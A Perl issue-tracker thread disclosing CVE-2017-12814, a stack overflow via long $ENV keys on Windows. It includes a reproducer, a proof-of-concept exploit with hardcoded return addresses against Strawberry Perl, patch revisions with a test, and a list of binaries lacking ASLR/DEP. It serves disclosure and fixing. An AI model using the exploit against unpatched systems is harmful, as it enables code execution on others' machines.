Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[CVE-2017-12814]Perl $ENV Key Stack Buffer Overflow #16051

Closed
p5pRT opened this issue Jun 27, 2017 · 37 comments
Closed

[CVE-2017-12814]Perl $ENV Key Stack Buffer Overflow #16051

p5pRT opened this issue Jun 27, 2017 · 37 comments

Comments

@p5pRT
Copy link
Collaborator

@p5pRT p5pRT commented Jun 27, 2017

Migrated from rt.perl.org#131665 (status was 'resolved')

Searchable as RT131665$

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Jun 27, 2017

From @AutoSecTools

 

 
 
 
 
  The CPerlHost​::Add method in win32\perlhost.h is vulnerable to a stack buffer overflow.
 

  void
  CPerlHost​::Add(LPCSTR lpStr)
  {
     char szBuffer[1024];
     LPSTR *lpPtr;
     int index, length = strlen(lpStr)+1;
 

     for(index = 0; lpStr[index] != '\0' && lpStr[index] != '='; ++index)
     szBuffer[index] = lpStr[index];
 

     szBuffer[index] = '\0';
     [...]
  }
 

  The issue exists because the size of lpStr, the key passed in when indexing into $ENV, is not checked before it is copied into szBuffer, a fixed size stack buffer.
 

  The issue can be reproduced on a win32 build with the following script.
 

  print "Starting\r\n";
  $ENV{"A" x (0x1000)} = 0;
  print "Done\r\n";
 

  In cases where the $ENV key is exposed as attack surface, it may be possible for an attacker to achieve arbitrary code execution. The issue was exploited in Strawberry Perl, which appears to be compiled without stack canaries and ASLR.
 

  print "Starting\r\n";
 

  $chars =
     "\x41\x41\x41\x41" .
     "\x78\x6e\x3b\x6e" .    # perl526!exit (6E3B6E78)
     "\x43\x43\x43\x43" .
     "\x4e\x1d\x1e\x03" .    # exit code (52305230)
     "\x45\x45\x45\x45" .
     "\x46\x46\x46\x46" .
     "\x47\x47\x47\x47" .
     "\x30\x2c\x3a\x6e";     # perl526!win32_getpid (6e3a2c30)
 

  $ENV{$chars x ((0x400+0x4*0x10) / length $chars)} = 0;
 

  print "Done\r\n";
 

  A proposed patch that validates the length of lpStr follows.
 

  diff --git "a/d​:\\source2\\perl-raw\\win32\\perlhost.h" "b/D​:\\source2\\perl\\win32\\perlhost.h"
  index 84b08c9..665504e 100644
  --- "a/d​:\\source2\\perl-raw\\win32\\perlhost.h"
  +++ "b/D​:\\source2\\perl\\win32\\perlhost.h"
  @​@​ -2177,12 +2177,15 @​@​ compare(const void *arg1, const void *arg2)
  void
  CPerlHost​::Add(LPCSTR lpStr)
  {
  -    char szBuffer[1024];
  +    char szBuffer[2048];
      LPSTR *lpPtr;
      int index, length = strlen(lpStr)+1;
 
      for(index = 0; lpStr[index] != '\0' && lpStr[index] != '='; ++index)
  - szBuffer[index] = lpStr[index];
  +        if (index != sizeof(szBuffer) - 1)
  +            szBuffer[index] = lpStr[index];
  +        else
  +            Perl_croak_nocontext("$ENV key too large");
 
      szBuffer[index] = '\0';
 
  Note that the buffer size had to be increased to accommodate larger values that were previously causing silent overwrites.
 

  Credit​: John Leitch ( john@​autosectools.com ), Bryce Darling ( darlingbryce@​gmail.com )
 
 
 

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Jul 6, 2017

From @tonycoz

As text, since RT didn't want to display it inline, and the text/html link displayed source​:

The CPerlHost​::Add method in win32\perlhost.h is vulnerable to a stack
buffer
overflow.

void

CPerlHost​::Add(LPCSTR lpStr)

{

char szBuffer[1024];

LPSTR *lpPtr;

int index, length = strlen(lpStr)+1;

for(index = 0; lpStr[index] != '\0' && lpStr[index] != '='; ++index)

szBuffer[index] = lpStr[index];

szBuffer[index] = '\0';

[...]

}

The issue exists because the size of lpStr, the key passed in when
indexing
into $ENV, is not checked before it is copied into szBuffer, a fixed
size stack
buffer.

The issue can be reproduced on a win32 build with the following
script.

print "Starting\r\n";

$ENV{"A" x (0x1000)} = 0;

print "Done\r\n";

In cases where the $ENV key is exposed as attack surface, it may be
possible
for an attacker to achieve arbitrary code execution. The issue was
exploited in
Strawberry Perl, which appears to be compiled without stack canaries
and ASLR.

print "Starting\r\n";

$chars =

"\x41\x41\x41\x41" .

"\x78\x6e\x3b\x6e" . # perl526!exit (6E3B6E78)

"\x43\x43\x43\x43" .

"\x4e\x1d\x1e\x03" . # exit code (52305230)

"\x45\x45\x45\x45" .

"\x46\x46\x46\x46" .

"\x47\x47\x47\x47" .

"\x30\x2c\x3a\x6e"; # perl526!win32_getpid (6e3a2c30)

$ENV{$chars x ((0x400+0x4*0x10) / length $chars)} = 0;

print "Done\r\n";

A proposed patch that validates the length of lpStr follows.

diff --git "a/d​:\\source2\\perl-raw\\win32\\perlhost.h"
"b/D​:\\source2\\perl\\win32\\perlhost.h"

index 84b08c9..665504e 100644

--- "a/d​:\\source2\\perl-raw\\win32\\perlhost.h"

+++ "b/D​:\\source2\\perl\\win32\\perlhost.h"

@​@​ -2177,12 +2177,15 @​@​ compare(const void *arg1, const void *arg2)

void

CPerlHost​::Add(LPCSTR lpStr)

{

- char szBuffer[1024];

+ char szBuffer[2048];

LPSTR *lpPtr;

int index, length = strlen(lpStr)+1;

for(index = 0; lpStr[index] != '\0' && lpStr[index] != '='; ++index)

- szBuffer[index] = lpStr[index];

+ if (index != sizeof(szBuffer) - 1)

+ szBuffer[index] = lpStr[index];

+ else

+ Perl_croak_nocontext("$ENV key too large");

szBuffer[index] = '\0';

Note that the buffer size had to be increased to accommodate larger
values that
were previously causing silent overwrites.

Credit​: John Leitch (john@​autosectools.com), Bryce Darling
(darlingbryce@​gmail.com)

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Jul 6, 2017

The RT System itself - Status changed from 'new' to 'open'

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Jul 6, 2017

From @tonycoz

On Tue, 27 Jun 2017 03​:22​:45 -0700, john@​autosectools.com wrote​:

CPerlHost​::Add(LPCSTR lpStr)

{

- char szBuffer[1024];

+ char szBuffer[2048];

LPSTR *lpPtr;

Why the 2048 byte limit? Neither 1024 not 2048 is the limit on the length of an environment variable entry or name, and they're each about as silly as the other as the practical length of an environment variable name.

I'd be inclined to either go for a dynamically allocated buffer, or a fixed buffer with a fallback to dynamic allocation.

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Jul 7, 2017

From @AutoSecTools

I kept it as a stack buffer in case of perf concerns, and upped the size
because one of the tests was overrunning. That said, I do think dynamic
allocation is a better solution, and will update the patch accordingly.

On 7/5/2017 06​:18 PM, Tony Cook via RT wrote​:

On Tue, 27 Jun 2017 03​:22​:45 -0700, john@​autosectools.com wrote​:

CPerlHost​::Add(LPCSTR lpStr)

{

- char szBuffer[1024];

+ char szBuffer[2048];

LPSTR *lpPtr;

Why the 2048 byte limit? Neither 1024 not 2048 is the limit on the length of an environment variable entry or name, and they're each about as silly as the other as the practical length of an environment variable name.

I'd be inclined to either go for a dynamically allocated buffer, or a fixed buffer with a fallback to dynamic allocation.

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Jul 7, 2017

From @tonycoz

On Thu, Jul 06, 2017 at 11​:13​:33PM -0700, John Leitch wrote​:

I kept it as a stack buffer in case of perf concerns, and upped the size
because one of the tests was overrunning. That said, I do think dynamic
allocation is a better solution, and will update the patch accordingly.

Please attach the patch rather than pasting in inline.

Thanks,
Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Jul 12, 2017

From @AutoSecTools

Attached is an updated patch that uses a dynamically allocated heap buffer.

John

On 7/6/2017 11​:18 PM, Tony Cook via RT wrote​:

On Thu, Jul 06, 2017 at 11​:13​:33PM -0700, John Leitch wrote​:

I kept it as a stack buffer in case of perf concerns, and upped the size
because one of the tests was overrunning. That said, I do think dynamic
allocation is a better solution, and will update the patch accordingly.
Please attach the patch rather than pasting in inline.

Thanks,
Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Jul 12, 2017

From @AutoSecTools

Perl_ENV_Stack_Buffer_Overflow_3.patch
diff --git "a/d:\\source2\\perl-raw\\win32\\perlhost.h" "b/D:\\source2\\perl\\win32\\perlhost.h"
index 84b08c9..eef3ac4 100644
--- "a/d:\\source2\\perl-raw\\win32\\perlhost.h"
+++ "b/D:\\source2\\perl\\win32\\perlhost.h"
@@ -2177,9 +2177,14 @@ compare(const void *arg1, const void *arg2)
 void
 CPerlHost::Add(LPCSTR lpStr)
 {
-    char szBuffer[1024];
+    LPSTR szBuffer;
     LPSTR *lpPtr;
     int index, length = strlen(lpStr)+1;
+    szBuffer = (LPSTR)Malloc(length);
+
+    if (szBuffer == NULL) {
+        Perl_croak_nocontext("Out of memory");
+    }
 
     for(index = 0; lpStr[index] != '\0' && lpStr[index] != '='; ++index)
 	szBuffer[index] = lpStr[index];
@@ -2188,6 +2193,7 @@ CPerlHost::Add(LPCSTR lpStr)
 
     // replacing ?
     lpPtr = Lookup(szBuffer);
+    Free(szBuffer);
     if (lpPtr != NULL) {
 	// must allocate things via host memory allocation functions 
 	// rather than perl's Renew() et al, as the perl interpreter
@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Jul 17, 2017

From @tonycoz

On Wed, 12 Jul 2017 01​:09​:44 -0700, john@​autosectools.com wrote​:

Attached is an updated patch that uses a dynamically allocated heap buffer.

That's what I was looking for, but...

I had a look over the Lookup() (and lookup()) code, and if I'm
reading it correctly it treats the string passed in as
terminated by either '=' or NUL, so the copy process that requires
the buffer is unnecessary.

The attached patch eliminates the buffer.

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Jul 17, 2017

From @tonycoz

0001-perl-131665-avoid-a-buffer-overflow-in-a-buffer-we-d.patch
From ea29f1f997817437106be659a9c357d01aba08b8 Mon Sep 17 00:00:00 2001
From: Tony Cook <tony@develop-help.com>
Date: Mon, 17 Jul 2017 15:21:08 +1000
Subject: (perl #131665) avoid a buffer overflow in a buffer we didn't need

since Lookup() treats its argument as NUL or '=' terminated.
---
 win32/perlhost.h | 10 ++--------
 1 file changed, 2 insertions(+), 8 deletions(-)

diff --git a/win32/perlhost.h b/win32/perlhost.h
index 84b08c9..0ce0175 100644
--- a/win32/perlhost.h
+++ b/win32/perlhost.h
@@ -2177,17 +2177,11 @@ compare(const void *arg1, const void *arg2)
 void
 CPerlHost::Add(LPCSTR lpStr)
 {
-    char szBuffer[1024];
     LPSTR *lpPtr;
-    int index, length = strlen(lpStr)+1;
-
-    for(index = 0; lpStr[index] != '\0' && lpStr[index] != '='; ++index)
-	szBuffer[index] = lpStr[index];
-
-    szBuffer[index] = '\0';
+    int length = strlen(lpStr)+1;
 
     // replacing ?
-    lpPtr = Lookup(szBuffer);
+    lpPtr = Lookup(lpStr);
     if (lpPtr != NULL) {
 	// must allocate things via host memory allocation functions 
 	// rather than perl's Renew() et al, as the perl interpreter
-- 
2.7.0.windows.1

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Jul 17, 2017

From @AutoSecTools

In that case, eliminating the superfluous buffer seems ideal.

John

On 7/16/2017 10​:22 PM, Tony Cook via RT wrote​:

On Wed, 12 Jul 2017 01​:09​:44 -0700, john@​autosectools.com wrote​:

Attached is an updated patch that uses a dynamically allocated heap buffer.
That's what I was looking for, but...

I had a look over the Lookup() (and lookup()) code, and if I'm
reading it correctly it treats the string passed in as
terminated by either '=' or NUL, so the copy process that requires
the buffer is unnecessary.

The attached patch eliminates the buffer.

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Jul 27, 2017

From @tonycoz

On Sun, 16 Jul 2017 22​:22​:12 -0700, tonyc wrote​:

I had a look over the Lookup() (and lookup()) code, and if I'm
reading it correctly it treats the string passed in as
terminated by either '=' or NUL, so the copy process that requires
the buffer is unnecessary.

The attached patch eliminates the buffer.

Added tests.

Do we need a CVE for this, and how are we allocating those now?

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Jul 27, 2017

From @tonycoz

0001-perl-131665-avoid-a-buffer-overflow-in-a-buffer-we-d.patch
From 35ce250032264068ed8f95410e9fbf81873d75b9 Mon Sep 17 00:00:00 2001
From: Tony Cook <tony@develop-help.com>
Date: Thu, 27 Jul 2017 10:12:02 +1000
Subject: (perl #131665) avoid a buffer overflow in a buffer we didn't need

since Lookup() treats its argument as NUL or '=' terminated.

Previously environment variable names longer than the size of the
buffer would result in a buffer overflow.
---
 t/win32/runenv.t | 21 ++++++++++++++++-----
 win32/perlhost.h | 10 ++--------
 2 files changed, 18 insertions(+), 13 deletions(-)

diff --git a/t/win32/runenv.t b/t/win32/runenv.t
index 514eda0..4746afa 100644
--- a/t/win32/runenv.t
+++ b/t/win32/runenv.t
@@ -14,10 +14,10 @@ BEGIN {
     require Win32;
     ($::os_id, $::os_major) = ( Win32::GetOSVersion() )[ 4, 1 ];
     if ($::os_id == 2 and $::os_major == 6) {    # Vista, Server 2008 (incl R2), 7
-	$::tests = 43;
+	$::tests = 45;
     }
     else {
-	$::tests = 40;
+	$::tests = 42;
     }
 
     require './test.pl';
@@ -70,11 +70,12 @@ sub runperl_and_capture {
 }
 
 sub try {
-  my ($env, $args, $stdout, $stderr) = @_;
+  my ($env, $args, $stdout, $stderr, $name) = @_;
   my ($actual_stdout, $actual_stderr) = runperl_and_capture($env, $args);
+  $name ||= "";
   local $::Level = $::Level + 1;
-  is $actual_stdout, $stdout;
-  is $actual_stderr, $stderr;
+  is $actual_stdout, $stdout, "$name - stdout";
+  is $actual_stderr, $stderr, "$name - stderr";
 }
 
 #  PERL5OPT    Command-line options (switches).  Switches in
@@ -196,6 +197,16 @@ try({PERL5LIB => "foo",
     '',
     '');
 
+{
+    # 131665
+    # crashes without the fix
+    my $longname = "X" x 2048;
+    try({ $longname => 1 },
+        [ '-e', '"print q/ok/"' ],
+        'ok', '',
+        'very long env var names' );
+}
+
 # Tests for S_incpush_use_sep():
 
 my @dump_inc = ('-e', '"print \"$_\n\" foreach @INC"');
diff --git a/win32/perlhost.h b/win32/perlhost.h
index 84b08c9..3260f62 100644
--- a/win32/perlhost.h
+++ b/win32/perlhost.h
@@ -2177,17 +2177,11 @@ compare(const void *arg1, const void *arg2)
 void
 CPerlHost::Add(LPCSTR lpStr)
 {
-    char szBuffer[1024];
     LPSTR *lpPtr;
-    int index, length = strlen(lpStr)+1;
-
-    for(index = 0; lpStr[index] != '\0' && lpStr[index] != '='; ++index)
-	szBuffer[index] = lpStr[index];
-
-    szBuffer[index] = '\0';
+    STRLEN length = strlen(lpStr)+1;
 
     // replacing ?
-    lpPtr = Lookup(szBuffer);
+    lpPtr = Lookup(lpStr);
     if (lpPtr != NULL) {
 	// must allocate things via host memory allocation functions 
 	// rather than perl's Renew() et al, as the perl interpreter
-- 
2.7.0.windows.1

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Aug 7, 2017

From @AutoSecTools

I would say this warrants a CVE as it is highly exploitable, especially
given the lack of mitigations in the two major windows builds, as
demonstrated by the exploit provided. Shellshock proved that there are
numerous vectors for controlling environment arguments, so it stands to
reason that the same is true for keys. Especially so, considering
complete control of the key is not necessary--even if the tainted key
data is prefixed and suffixed with trusted data, this vuln can still
exploited.

Also, to further expand upon the impact of this issue, please find
attached a list of all modules in ActiveState and Strawberry Perl that
had ASLR and/or DEP disabled.

John

On 7/26/2017 05​:12 PM, Tony Cook via RT wrote​:

On Sun, 16 Jul 2017 22​:22​:12 -0700, tonyc wrote​:

I had a look over the Lookup() (and lookup()) code, and if I'm
reading it correctly it treats the string passed in as
terminated by either '=' or NUL, so the copy process that requires
the buffer is unnecessary.

The attached patch eliminates the buffer.
Added tests.

Do we need a CVE for this, and how are we allocating those now?

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Aug 7, 2017

From @AutoSecTools

No ASLR or DEP
activestate\perl\bin\perl.exe
activestate\perl\bin\perl5.24.1.exe
activestate\perl\bin\perl524.dll
activestate\perl\bin\PerlEx30.dll
activestate\perl\bin\PerlEz.dll
activestate\perl\bin\perlglob.exe
activestate\perl\bin\perlis.dll
activestate\perl\bin\PerlMsg.dll
activestate\perl\bin\PerlSE.dll
activestate\perl\bin\wperl.exe
activestate\perl\lib\auto\ActiveState\Scineplex\Scineplex.dll
activestate\perl\lib\auto\ActiveState\Win32\Shell\Shell.dll
activestate\perl\lib\auto\arybase\arybase.dll
activestate\perl\lib\auto\attributes\attributes.dll
activestate\perl\lib\auto\B\B.dll
activestate\perl\lib\auto\Bit\Vector\Vector.dll
activestate\perl\lib\auto\Class\Load\XS\XS.dll
activestate\perl\lib\auto\Clone\Clone.dll
activestate\perl\lib\auto\Compress\Raw\Bzip2\Bzip2.dll
activestate\perl\lib\auto\Compress\Raw\Zlib\Zlib.dll
activestate\perl\lib\auto\Cwd\Cwd.dll
activestate\perl\lib\auto\Data\Dumper\Dumper.dll
activestate\perl\lib\auto\DBD\ODBC\ODBC.dll
activestate\perl\lib\auto\DBD\Oracle\Oracle.dll
activestate\perl\lib\auto\DBD\Pg\Pg.dll
activestate\perl\lib\auto\DBD\SQLite\SQLite.dll
activestate\perl\lib\auto\DBI\DBI.dll
activestate\perl\lib\auto\Devel\NYTProf\NYTProf.dll
activestate\perl\lib\auto\Devel\Peek\Peek.dll
activestate\perl\lib\auto\Devel\PPPort\PPPort.dll
activestate\perl\lib\auto\Digest\MD5\MD5.dll
activestate\perl\lib\auto\Digest\SHA\SHA.dll
activestate\perl\lib\auto\Digest\SHA1\SHA1.dll
activestate\perl\lib\auto\Encode\Encode.dll
activestate\perl\lib\auto\Encode\Byte\Byte.dll
activestate\perl\lib\auto\Encode\CN\CN.dll
activestate\perl\lib\auto\Encode\EBCDIC\EBCDIC.dll
activestate\perl\lib\auto\Encode\JP\JP.dll
activestate\perl\lib\auto\Encode\KR\KR.dll
activestate\perl\lib\auto\Encode\Symbol\Symbol.dll
activestate\perl\lib\auto\Encode\TW\TW.dll
activestate\perl\lib\auto\Encode\Unicode\Unicode.dll
activestate\perl\lib\auto\Fcntl\Fcntl.dll
activestate\perl\lib\auto\File\DosGlob\DosGlob.dll
activestate\perl\lib\auto\File\Glob\Glob.dll
activestate\perl\lib\auto\Filter\Util\Call\Call.dll
activestate\perl\lib\auto\GD\GD.dll
activestate\perl\lib\auto\Hash\Util\Util.dll
activestate\perl\lib\auto\Hash\Util\FieldHash\FieldHash.dll
activestate\perl\lib\auto\HTML\Parser\Parser.dll
activestate\perl\lib\auto\IO\IO.dll
activestate\perl\lib\auto\List\MoreUtils\MoreUtils.dll
activestate\perl\lib\auto\List\Util\Util.dll
activestate\perl\lib\auto\Math\BigInt\FastCalc\FastCalc.dll
activestate\perl\lib\auto\Math\BigInt\GMP\GMP.dll
activestate\perl\lib\auto\Math\Prime\Util\Util.dll
activestate\perl\lib\auto\Math\Prime\Util\GMP\GMP.dll
activestate\perl\lib\auto\MIME\Base64\Base64.dll
activestate\perl\lib\auto\Moose\Moose.dll
activestate\perl\lib\auto\MRO\mro.dll
activestate\perl\lib\auto\Net\SSLeay\SSLeay.dll
activestate\perl\lib\auto\Opcode\Opcode.dll
activestate\perl\lib\auto\Package\Stash\XS\XS.dll
activestate\perl\lib\auto\Params\Classify\Classify.dll
activestate\perl\lib\auto\Params\Util\Util.dll
activestate\perl\lib\auto\PerlIO\encoding\encoding.dll
activestate\perl\lib\auto\PerlIO\mmap\mmap.dll
activestate\perl\lib\auto\PerlIO\scalar\scalar.dll
activestate\perl\lib\auto\PerlIO\via\via.dll
activestate\perl\lib\auto\POSIX\POSIX.dll
activestate\perl\lib\auto\re\re.dll
activestate\perl\lib\auto\SDBM_File\SDBM_File.dll
activestate\perl\lib\auto\Socket\Socket.dll
activestate\perl\lib\auto\Storable\Storable.dll
activestate\perl\lib\auto\Sub\Identify\Identify.dll
activestate\perl\lib\auto\Sub\Name\Name.dll
activestate\perl\lib\auto\Sys\Hostname\Hostname.dll
activestate\perl\lib\auto\Sys\Syslog\PerlLog.dll
activestate\perl\lib\auto\Sys\Syslog\Syslog.dll
activestate\perl\lib\auto\Tcl\Tcl.dll
activestate\perl\lib\auto\Tcl\tkkit.dll
activestate\perl\lib\auto\Term\ReadKey\ReadKey.dll
activestate\perl\lib\auto\Text\CSV_XS\CSV_XS.dll
activestate\perl\lib\auto\threads\threads.dll
activestate\perl\lib\auto\threads\shared\shared.dll
activestate\perl\lib\auto\Tie\Hash\NamedCapture\NamedCapture.dll
activestate\perl\lib\auto\Time\HiRes\HiRes.dll
activestate\perl\lib\auto\Time\Piece\Piece.dll
activestate\perl\lib\auto\Unicode\Collate\Collate.dll
activestate\perl\lib\auto\Unicode\Normalize\Normalize.dll
activestate\perl\lib\auto\Variable\Magic\Magic.dll
activestate\perl\lib\auto\Version\vxs\vxs.dll
activestate\perl\lib\auto\Win32\Win32.dll
activestate\perl\lib\auto\Win32\API\API.dll
activestate\perl\lib\auto\Win32\API\Callback\Callback.dll
activestate\perl\lib\auto\Win32\AuthenticateUser\AuthenticateUser.dll
activestate\perl\lib\auto\Win32\ChangeNotify\ChangeNotify.dll
activestate\perl\lib\auto\Win32\Clipboard\Clipboard.dll
activestate\perl\lib\auto\Win32\Console\Console.dll
activestate\perl\lib\auto\Win32\Console\ANSI\ANSI.dll
activestate\perl\lib\auto\Win32\Event\Event.dll
activestate\perl\lib\auto\Win32\EventLog\EventLog.dll
activestate\perl\lib\auto\Win32\File\File.dll
activestate\perl\lib\auto\Win32\FileSecurity\FileSecurity.dll
activestate\perl\lib\auto\Win32\Internet\Internet.dll
activestate\perl\lib\auto\Win32\IPC\IPC.dll
activestate\perl\lib\auto\Win32\Job\Job.dll
activestate\perl\lib\auto\Win32\Mutex\Mutex.dll
activestate\perl\lib\auto\Win32\NetAdmin\NetAdmin.dll
activestate\perl\lib\auto\Win32\NetResource\NetResource.dll
activestate\perl\lib\auto\Win32\ODBC\ODBC.dll
activestate\perl\lib\auto\Win32\OLE\OLE.dll
activestate\perl\lib\auto\Win32\PerfLib\PerfLib.dll
activestate\perl\lib\auto\Win32\Pipe\Pipe.dll
activestate\perl\lib\auto\Win32\Process\Process.dll
activestate\perl\lib\auto\Win32\Registry\Registry.dll
activestate\perl\lib\auto\Win32\Semaphore\Semaphore.dll
activestate\perl\lib\auto\Win32\Service\Service.dll
activestate\perl\lib\auto\Win32\Shortcut\Shortcut.dll
activestate\perl\lib\auto\Win32\Sound\Sound.dll
activestate\perl\lib\auto\Win32\WinError\WinError.dll
activestate\perl\lib\auto\Win32API\File\File.dll
activestate\perl\lib\auto\Win32API\Net\Net.dll
activestate\perl\lib\auto\Win32API\Registry\Registry.dll
activestate\perl\lib\auto\XML\Parser\Expat\Expat.dll
activestate\perl\lib\auto\YAML\XS\LibYAML\LibYAML.dll
activestate\perl\lib\Devel\auto\Devel\NYTProf\NYTProf.dll
strawberry\c\bin\addr2line.exe
strawberry\c\bin\ar.exe
strawberry\c\bin\as.exe
strawberry\c\bin\c++.exe
strawberry\c\bin\c++filt.exe
strawberry\c\bin\cpp.exe
strawberry\c\bin\dlltool.exe
strawberry\c\bin\dllwrap.exe
strawberry\c\bin\dmake.exe
strawberry\c\bin\dwp.exe
strawberry\c\bin\elfedit.exe
strawberry\c\bin\g++.exe
strawberry\c\bin\gcc-ar.exe
strawberry\c\bin\gcc-nm.exe
strawberry\c\bin\gcc-ranlib.exe
strawberry\c\bin\gcc.exe
strawberry\c\bin\gcov-dump.exe
strawberry\c\bin\gcov-tool.exe
strawberry\c\bin\gcov.exe
strawberry\c\bin\gdb.exe
strawberry\c\bin\gdborig.exe
strawberry\c\bin\gdbserver.exe
strawberry\c\bin\gendef.exe
strawberry\c\bin\genidl.exe
strawberry\c\bin\genpeimg.exe
strawberry\c\bin\gfortran.exe
strawberry\c\bin\gmake.exe
strawberry\c\bin\gprof.exe
strawberry\c\bin\i686-w64-mingw32-c++.exe
strawberry\c\bin\i686-w64-mingw32-g++.exe
strawberry\c\bin\i686-w64-mingw32-gcc-7.1.0.exe
strawberry\c\bin\i686-w64-mingw32-gcc-ar.exe
strawberry\c\bin\i686-w64-mingw32-gcc-nm.exe
strawberry\c\bin\i686-w64-mingw32-gcc-ranlib.exe
strawberry\c\bin\i686-w64-mingw32-gcc.exe
strawberry\c\bin\i686-w64-mingw32-gfortran.exe
strawberry\c\bin\iconv.exe
strawberry\c\bin\ld.exe
strawberry\c\bin\libatomic-1.dll
strawberry\c\bin\libbz2-1_.dll
strawberry\c\bin\libcharset-1_.dll
strawberry\c\bin\libcrypto-1_1_.dll
strawberry\c\bin\libdb-6.2_.dll
strawberry\c\bin\libexpat-1_.dll
strawberry\c\bin\libexslt-0_.dll
strawberry\c\bin\libffi-6_.dll
strawberry\c\bin\libfreeglut_.dll
strawberry\c\bin\libfreetype-6_.dll
strawberry\c\bin\libgcc_s_dw2-1.dll
strawberry\c\bin\libgd-3_.dll
strawberry\c\bin\libgdbm-4_.dll
strawberry\c\bin\libgdbm_compat-4_.dll
strawberry\c\bin\libgfortran-4.dll
strawberry\c\bin\libgif-7_.dll
strawberry\c\bin\libgomp-1.dll
strawberry\c\bin\libiconv-2_.dll
strawberry\c\bin\libjpeg-9_.dll
strawberry\c\bin\liblzma-5_.dll
strawberry\c\bin\libmysql_.dll
strawberry\c\bin\libpng16-16_.dll
strawberry\c\bin\libpq_.dll
strawberry\c\bin\libquadmath-0.dll
strawberry\c\bin\libssh2-1_.dll
strawberry\c\bin\libssl-1_1_.dll
strawberry\c\bin\libssp-0.dll
strawberry\c\bin\libstdc++-6.dll
strawberry\c\bin\libt1-5_.dll
strawberry\c\bin\libtiff-5_.dll
strawberry\c\bin\libtiffxx-5_.dll
strawberry\c\bin\libwinpthread-1.dll
strawberry\c\bin\libxml2-2_.dll
strawberry\c\bin\libXpm_.dll
strawberry\c\bin\libxslt-1_.dll
strawberry\c\bin\nm.exe
strawberry\c\bin\objcopy.exe
strawberry\c\bin\objdump.exe
strawberry\c\bin\openssl.exe
strawberry\c\bin\patch.exe
strawberry\c\bin\pexports.exe
strawberry\c\bin\pg_config.exe
strawberry\c\bin\ranlib.exe
strawberry\c\bin\readelf.exe
strawberry\c\bin\size.exe
strawberry\c\bin\strings.exe
strawberry\c\bin\strip.exe
strawberry\c\bin\widl.exe
strawberry\c\bin\windmc.exe
strawberry\c\bin\windres.exe
strawberry\c\bin\xmlcatalog.exe
strawberry\c\bin\xmllint.exe
strawberry\c\bin\xsltproc.exe
strawberry\c\bin\zlib1_.dll
strawberry\c\i686-w64-mingw32\bin\ar.exe
strawberry\c\i686-w64-mingw32\bin\as.exe
strawberry\c\i686-w64-mingw32\bin\dlltool.exe
strawberry\c\i686-w64-mingw32\bin\ld.bfd.exe
strawberry\c\i686-w64-mingw32\bin\ld.exe
strawberry\c\i686-w64-mingw32\bin\ld.gold.exe
strawberry\c\i686-w64-mingw32\bin\nm.exe
strawberry\c\i686-w64-mingw32\bin\objcopy.exe
strawberry\c\i686-w64-mingw32\bin\objdump.exe
strawberry\c\i686-w64-mingw32\bin\ranlib.exe
strawberry\c\i686-w64-mingw32\bin\readelf.exe
strawberry\c\i686-w64-mingw32\bin\strip.exe
strawberry\c\libexec\gcc\i686-w64-mingw32\7.1.0\cc1.exe
strawberry\c\libexec\gcc\i686-w64-mingw32\7.1.0\cc1plus.exe
strawberry\c\libexec\gcc\i686-w64-mingw32\7.1.0\collect2.exe
strawberry\c\libexec\gcc\i686-w64-mingw32\7.1.0\f951.exe
strawberry\c\libexec\gcc\i686-w64-mingw32\7.1.0\liblto_plugin-0.dll
strawberry\c\libexec\gcc\i686-w64-mingw32\7.1.0\lto-wrapper.exe
strawberry\c\libexec\gcc\i686-w64-mingw32\7.1.0\lto1.exe
strawberry\c\libexec\gcc\i686-w64-mingw32\7.1.0\install-tools\fixincl.exe
strawberry\perl\bin\libgcc_s_dw2-1.dll
strawberry\perl\bin\libstdc++-6.dll
strawberry\perl\bin\libwinpthread-1.dll
strawberry\perl\bin\nssm_32.exe
strawberry\perl\bin\nssm_64.exe
strawberry\perl\bin\perl.exe
strawberry\perl\bin\perl5.26.0.exe
strawberry\perl\bin\perl526.dll
strawberry\perl\bin\perlglob.exe
strawberry\perl\bin\wperl.exe
strawberry\perl\lib\auto\arybase\arybase.xs.dll
strawberry\perl\lib\auto\attributes\attributes.xs.dll
strawberry\perl\lib\auto\B\B.xs.dll
strawberry\perl\lib\auto\Compress\Raw\Bzip2\Bzip2.xs.dll
strawberry\perl\lib\auto\Compress\Raw\Zlib\Zlib.xs.dll
strawberry\perl\lib\auto\Cwd\Cwd.xs.dll
strawberry\perl\lib\auto\Data\Dumper\Dumper.xs.dll
strawberry\perl\lib\auto\Devel\Peek\Peek.xs.dll
strawberry\perl\lib\auto\Devel\PPPort\PPPort.xs.dll
strawberry\perl\lib\auto\Digest\MD5\MD5.xs.dll
strawberry\perl\lib\auto\Digest\SHA\SHA.xs.dll
strawberry\perl\lib\auto\Encode\Encode.xs.dll
strawberry\perl\lib\auto\Encode\Byte\Byte.xs.dll
strawberry\perl\lib\auto\Encode\CN\CN.xs.dll
strawberry\perl\lib\auto\Encode\EBCDIC\EBCDIC.xs.dll
strawberry\perl\lib\auto\Encode\JP\JP.xs.dll
strawberry\perl\lib\auto\Encode\KR\KR.xs.dll
strawberry\perl\lib\auto\Encode\Symbol\Symbol.xs.dll
strawberry\perl\lib\auto\Encode\TW\TW.xs.dll
